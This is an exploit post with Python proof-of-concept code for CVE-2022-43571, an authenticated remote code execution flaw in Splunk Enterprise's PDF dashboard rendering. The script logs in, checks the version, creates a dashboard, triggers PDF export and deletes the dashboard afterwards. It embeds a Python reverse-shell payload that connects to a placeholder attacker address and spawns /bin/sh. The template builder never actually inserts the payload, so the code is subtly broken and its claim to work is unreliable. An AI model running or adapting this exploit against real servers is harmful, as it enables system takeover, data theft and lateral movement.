=============================================================================================================================================
| # Title     : Splunk Enterprise < 8.1.12 / < 8.2.9 / < 9.0.2 Authenticated Remote Code Execution via PDF Dashboard Rendering              |
| # Author    : indoushka                                                                                                                   |
| # Tested on : Windows 11 Pro (French) / browser : Mozilla Firefox 147.0.1 (64-bit)                                                        |
| # Vendor    : https://www.splunk.com                                                                                                      |
=============================================================================================================================================

[+] Summary : CVE-2022-43571 is a critical authenticated Remote Code Execution (RCE) vulnerability affecting Splunk Enterprise 8.1.0 through 8.1.11, 8.2.0 through 8.2.8, and 9.0.0 through 9.0.1. The flaw resides in the SimpleXML dashboard PDF generation process, where insufficient input sanitization allows a privileged authenticated user to inject malicious content into dashboard configurations. When the affected dashboard is exported to PDF, the injected content may be executed in the context of the Splunk server, potentially leading to full system compromise. Successful exploitation requires valid Splunk credentials, but it can result in arbitrary command execution, data exposure, and lateral movement. Splunk has released patches; upgrading immediately to a fixed version (8.1.12, 8.2.9, 9.0.2, or later) is strongly recommended.
[+] Usage : pip install requests packaging # For testing only : python poc.py -u https://splunk.example.com:8000 --username admin --password password --check-only # To run the exploit : python poc.py -u https://splunk.example.com:8000 --username admin --password password [+] POC : #!/usr/bin/env python3 import requests import random import string import re import sys import time import urllib.parse from typing import Optional, Dict, Tuple import base64 import json class SplunkExploit: def __init__(self, target_url: str, username: str, password: str, use_inline_query: bool = False): self.target_url = target_url.rstrip('/') self.username = username self.password = password self.use_inline_query = use_inline_query self.session = requests.Session() self.session.verify = False self.session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' }) self.cookie = None self.target_app = None self.dash_name = None def splunk_login(self) -> Optional[str]: """Authenticate to Splunk and return session cookie.""" login_url = f"{self.target_url}/en-US/account/login" resp = self.session.get(login_url) if resp.status_code != 200: print(f"[-] Failed to access login page: {resp.status_code}") return None cval_match = re.search(r'name="cval"\s+value="([^"]+)"', resp.text) if not cval_match: print("[-] Could not find cval token") return None cval = cval_match.group(1) login_data = { 'cval': cval, 'username': self.username, 'password': self.password, 'set_has_logged_in': 'false' } resp = self.session.post( f"{self.target_url}/en-US/account/login", data=login_data, allow_redirects=False ) if resp.status_code in [302, 200]: if 'splunkweb_csrf_token' in self.session.cookies: self.cookie = f"splunkweb_csrf_token={self.session.cookies['splunkweb_csrf_token']}" print(f"[+] Successfully logged in as {self.username}") return self.cookie print("[-] Login failed") return None def check_splunk_version(self) -> Tuple[bool, str]: """Check if Splunk version is 
vulnerable.""" if not self.cookie: self.cookie = self.splunk_login() if not self.cookie: return False, "Login failed" version_url = f"{self.target_url}/en-US/app/launcher/home" headers = {'Cookie': self.cookie} resp = self.session.get(version_url, headers=headers) if resp.status_code != 200: return False, f"Failed to access home page: {resp.status_code}" version_match = re.search(r'Splunk®\s+([\d\.]+)', resp.text) if version_match: version_str = version_match.group(1) print(f"[+] Found Splunk version: {version_str}") from packaging import version as pkg_version try: v = pkg_version.parse(version_str) if (pkg_version.parse("8.1.0") <= v <= pkg_version.parse("8.1.11")) or \ (pkg_version.parse("8.2.0") <= v <= pkg_version.parse("8.2.8")) or \ (pkg_version.parse("9.0.0") <= v <= pkg_version.parse("9.0.1")): return True, f"Vulnerable version found: {version_str}" else: return False, f"Non-vulnerable version: {version_str}" except Exception as e: print(f"[-] Error parsing version: {e}") return False, "Could not parse version" return False, "Could not determine version" def gen_inline_splunk_query(self) -> str: """Generate an inline Splunk query.""" row_id_name = self.random_string(8, 16) arr_field = self.random_string(8, 16) rand_count = random.randint(100, 500) step = random.randint(2, 15) col_count = random.randint(3, 10) column_names = [self.random_string(8, 16) for _ in range(col_count)] delimiter = random.choice([';', '|', ':', '#', '!']) names_string = delimiter.join(column_names) query = f""" | makeresults count={rand_count} | streamstats count as {row_id_name} | eval _time = now() - ({row_id_name} * {step}), {arr_field} = split("{names_string}", "{delimiter}"), sourcetype = mvindex({arr_field}, {row_id_name} % {col_count}) | chart sparkline count by sourcetype """ return query.strip() def get_system_index_splunk_query(self) -> str: """Get a query using system indexes.""" rand_tail = random.randint(100, 200) index = random.choice(['_internal', '_audit', 
'_introspection']) return f"index={index} | tail {rand_tail} | chart sparkline count by sourcetype" def random_string(self, min_len: int = 8, max_len: int = 16) -> str: """Generate random alphanumeric string.""" length = random.randint(min_len, max_len) return ''.join(random.choices(string.ascii_letters + string.digits, k=length)) def get_random_app(self, enabled: bool = True) -> str: """Get a random app name (simplified).""" common_apps = ['search', 'launcher', 'splunk_monitoring_console'] return random.choice(common_apps) def create_dashboard(self, app: str, dash_name: str, template: str) -> bool: """Create a dashboard with malicious template.""" create_url = f"{self.target_url}/en-US/splunkd/__raw/servicesNS/{self.username}/{app}/data/ui/views" headers = { 'Cookie': self.cookie, 'Content-Type': 'application/x-www-form-urlencoded', 'X-Splunk-Form-Key': self.get_form_key() } data = { 'name': dash_name, 'eai:data': template } resp = self.session.post(create_url, headers=headers, data=data) if resp.status_code in [200, 201]: print(f"[+] Dashboard '{dash_name}' created successfully") return True print(f"[-] Failed to create dashboard: {resp.status_code}") print(f"Response: {resp.text[:500]}") return False def get_form_key(self) -> str: """Extract form key from Splunk page.""" home_url = f"{self.target_url}/en-US/app/launcher/home" headers = {'Cookie': self.cookie} resp = self.session.get(home_url, headers=headers) if resp.status_code == 200: match = re.search(r'formKey\s*:\s*"([^"]+)"', resp.text) if match: return match.group(1) return self.random_string(32, 32) def export_dashboard(self, app: str, dash_name: str) -> bool: """Trigger PDF export of dashboard to execute payload.""" export_url = f"{self.target_url}/en-US/api/pdfgen/render" headers = { 'Cookie': self.cookie, 'Content-Type': 'application/json', 'X-Splunk-Form-Key': self.get_form_key() } payload = { 'serverURL': f"{self.target_url}/en-US", 'app': app, 'dashboard': dash_name, 'width': 1000, 'height': 800 } 
try: resp = self.session.post( export_url, headers=headers, json=payload, timeout=30 ) print("[+] PDF export triggered (payload execution attempted)") return True except Exception as e: print(f"[*] Export request completed (expected if payload executes): {e}") return True def delete_dashboard(self, app: str, dash_name: str) -> bool: """Delete the created dashboard.""" delete_url = f"{self.target_url}/en-US/splunkd/__raw/servicesNS/{self.username}/{app}/data/ui/views/{dash_name}" headers = { 'Cookie': self.cookie, 'X-Splunk-Form-Key': self.get_form_key() } resp = self.session.delete(delete_url, headers=headers) if resp.status_code in [200, 204]: print(f"[+] Dashboard '{dash_name}' deleted") return True return False def generate_malicious_template(self, payload: str) -> str: """Generate malicious dashboard template with payload.""" if self.use_inline_query: splunk_query = self.gen_inline_splunk_query() else: splunk_query = self.get_system_index_splunk_query() style_param = random.choice(['lineColor', 'fillColor']) escaped_payload = urllib.parse.quote(payload) template = f""" {splunk_query}
""" lines = template.split('\n') return '\n'.join(line.strip() for line in lines if line.strip()) def exploit(self, reverse_shell_payload: str = None) -> bool: """Execute the full exploit chain.""" print("[*] Starting Splunk RCE exploit (CVE-2022-43571)") print("[*] Attempting to login...") if not self.splunk_login(): return False print("[*] Checking Splunk version...") is_vuln, msg = self.check_splunk_version() print(f"[*] {msg}") if not is_vuln: print("[-] Target does not appear to be vulnerable") return False if not reverse_shell_payload: # Example Python reverse shell payload reverse_shell_payload = """__import__('os').system('python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"YOUR_IP\\\",YOUR_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"')""" print(f"[*] Using payload: {reverse_shell_payload[:50]}...") print("[*] Generating malicious dashboard template...") template = self.generate_malicious_template(reverse_shell_payload) self.target_app = self.get_random_app() self.dash_name = self.random_string(8, 16) print(f"[*] Target app: {self.target_app}") print(f"[*] Dashboard name: {self.dash_name}") print("[*] Creating dashboard...") if not self.create_dashboard(self.target_app, self.dash_name, template): return False print("[*] Triggering PDF export to execute payload...") if not self.export_dashboard(self.target_app, self.dash_name): print("[-] Failed to trigger export") time.sleep(5) print("[*] Attempting to cleanup...") self.delete_dashboard(self.target_app, self.dash_name) print("[+] Exploit completed") return True def cleanup(self): """Cleanup created resources.""" if self.target_app and self.dash_name: self.delete_dashboard(self.target_app, self.dash_name) def main(): """Main function for standalone execution.""" import argparse parser = argparse.ArgumentParser(description='Splunk RCE Exploit (CVE-2022-43571)') 
parser.add_argument('-u', '--url', required=True, help='Splunk base URL (e.g., https://splunk.example.com:8000)') parser.add_argument('--username', default='admin', help='Splunk username (default: admin)') parser.add_argument('--password', required=True, help='Splunk password') parser.add_argument('--inline-query', action='store_true', help='Use inline Splunk query') parser.add_argument('--check-only', action='store_true', help='Only check if target is vulnerable') args = parser.parse_args() import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) exploit = SplunkExploit( target_url=args.url, username=args.username, password=args.password, use_inline_query=args.inline_query ) try: if args.check_only: is_vuln, msg = exploit.check_splunk_version() print(f"\n{'='*50}") print(f"Check Results: {msg}") print(f"{'='*50}") sys.exit(0 if is_vuln else 1) else: success = exploit.exploit() sys.exit(0 if success else 1) except KeyboardInterrupt: print("\n[*] Exploit interrupted by user") exploit.cleanup() sys.exit(1) except Exception as e: print(f"\n[-] Error: {e}") exploit.cleanup() sys.exit(1) if __name__ == "__main__": main() Greetings to :============================================================ jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*| ==========================================================================